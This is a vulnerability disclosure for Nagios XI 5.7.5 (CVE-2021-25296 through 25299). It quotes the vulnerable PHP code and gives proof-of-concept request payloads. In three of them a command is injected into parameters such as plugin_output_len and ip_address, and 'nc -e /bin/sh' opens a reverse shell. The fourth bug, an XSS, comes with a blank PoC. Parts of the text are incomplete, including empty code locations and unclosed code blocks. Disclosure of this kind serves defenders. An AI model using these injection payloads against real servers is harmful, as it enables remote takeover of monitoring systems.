Nagios XI 5.7.5 Remote Code Execution

Related Vulnerabilities: CVE-2021-25296   CVE-2021-25297   CVE-2021-25298   CVE-2021-25299  
Publish Date: 26 Feb 2021

                # nagios-xi-5.7.5-bugs
Bugs reported to Nagios XI

## CVE-2021-25296

### Code Location


### Code snippet

if (!empty($plugin_output_len)) {
    $disk_wmi_command .= " --forcetruncateoutput " . $plugin_output_len;
    $service_wmi_command .= " --forcetruncateoutput " . $plugin_output_len;
    $process_wmi_command .= " --forcetruncateoutput " . $plugin_output_len;
echo $disk_wmi_command;
// Run the WMI plugin to get realtime info
exec($disk_wmi_command, $disk_output, $disk_return_var);
exec($service_wmi_command, $service_output, $service_return_var);
exec($process_wmi_command, $process_output, $process_return_var);

### POC (Works with admin/non-admin authentication)

`; nc -e /bin/sh 4444;&submitButton2=`

The `plugin_output_len` variable here is not sanitized and can give `command execution`. Eg: `plugin_output_len=1024; nc -e /bin/sh 4444;`

## CVE-2021-25297

### Code Location


### Code Snippet

function switch_configwizard_add_cfg_to_mrtg($address)
    // get the data that we need
    $mrtg_confd_dir = "/etc/mrtg/conf.d";
    echo $address;
    $mrtg_cfg_file = "{$address}.cfg";
    $absolute_mrtg_cfg_file = "{$mrtg_confd_dir}/{$mrtg_cfg_file}";
    $cfgmaker_file = switch_configwizard_get_walk_file($address);
    // check if the file already exists for useful debugging
    $mrtg_confd_contents = scandir($mrtg_confd_dir);
    echo "REACHED HERE1";
    if (in_array($mrtg_cfg_file, $mrtg_confd_contents)) {
        debug("{$mrtg_cfg_file} exists in {$mrtg_confd_dir}, overwriting");
    } else {
        debug("{$mrtg_cfg_file} does not exist in {$mrtg_confd_dir}, creating");
    echo "REACHED HERE2";
    // copy the cfgmaker file to the mrtg cfg destination
    echo $cfgmaker_file;
    echo $absolute_mrtg_cfg_file;
    if (!copy($cfgmaker_file, $absolute_mrtg_cfg_file)) {
        debug("Unable to copy from {$cfgmaker_file} to {$absolute_mrtg_cfg_file}");
        return false;
    echo "REACHED HERE3";
    echo $absolute_mrtg_cfg_file;
    // add some meta info to the file
    $infoline = "#### ADDED BY NAGIOSXI (User: ". get_user_attr(0, 'username') .", DATE: ". get_datetime_string(time()) .") ####\n";
    exec("sed -i '1s|.*|{$infoline}&|' $absolute_mrtg_cfg_file");

    return true;

### POC (Works with admin/non-admin authentication)

```;nc -e /bin/sh 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_speed_in_percent=50&crit_speed_in_percent=80&warn_speed_out_percent=50&crit_speed_out_percent=80&default_port_speed=100&submitButton2=

The `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e /bin/sh 4444;`

## CVE-2021-25298

### Code path


### Code Snippet


  //    echo ("reached here ============================");
            // Get variables that were passed to us
            $address = grab_array_var($inargs, "ip_address", ""); // [User input]
            $port = grab_array_var($inargs, "port", "");
            $token = grab_array_var($inargs, "token", "");
            $no_ssl_verify = grab_array_var($inargs, "no_ssl_verify", 1);
            $hostname = grab_array_var($inargs, 'hostname', gethostbyaddr($address));
            $default_mem_units = grab_array_var($inargs, 'default_mem_units', 'Gi');
            $tcp_check_port = grab_array_var($inargs, 'tcp_check_port', '5693');
            $rp_address = nagiosccm_replace_user_macros($address);
            $rp_port = nagiosccm_replace_user_macros($port);
            $rp_token = nagiosccm_replace_user_macros($token);
            $services_serial = grab_array_var($inargs, "services_serial", "");
            if ($services_serial) {
                $services = unserialize(base64_decode($services_serial));
  //    echo $rp_address;
            $not_used = array();
            $return_code = 0;
            $alternative_host_check = false;
            exec('ping -W 2 -c 1 ' . $rp_address, $not_used, $return_code); // [Bug here]

### POC (Works with admin/non-admin authentication)

```;nc -e /bin/sh 4445;&port=5693&token=123&submitButton2=

The `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e /bin/sh 4444;`

## CVE-2021-25299

### Code Location


### Code Snippet

<?php if ($efe) { ?>
    <iframe src="<?php echo $url; ?>" style="width: 50%; min-width: 600px; height: 500px;"></iframe>
    <?php } else { ?>
    <div style="color: #FFF; font-size: 14px; font-family: consolas, courier-new; background-color: #000; padding: 2px 6px; overflow-y: scroll; width: 50%; min-width: 600px; height: 500px;">Enterprise features must be enabled</div>

### POC


The `url` variable is not sanitized and can give `xss` .
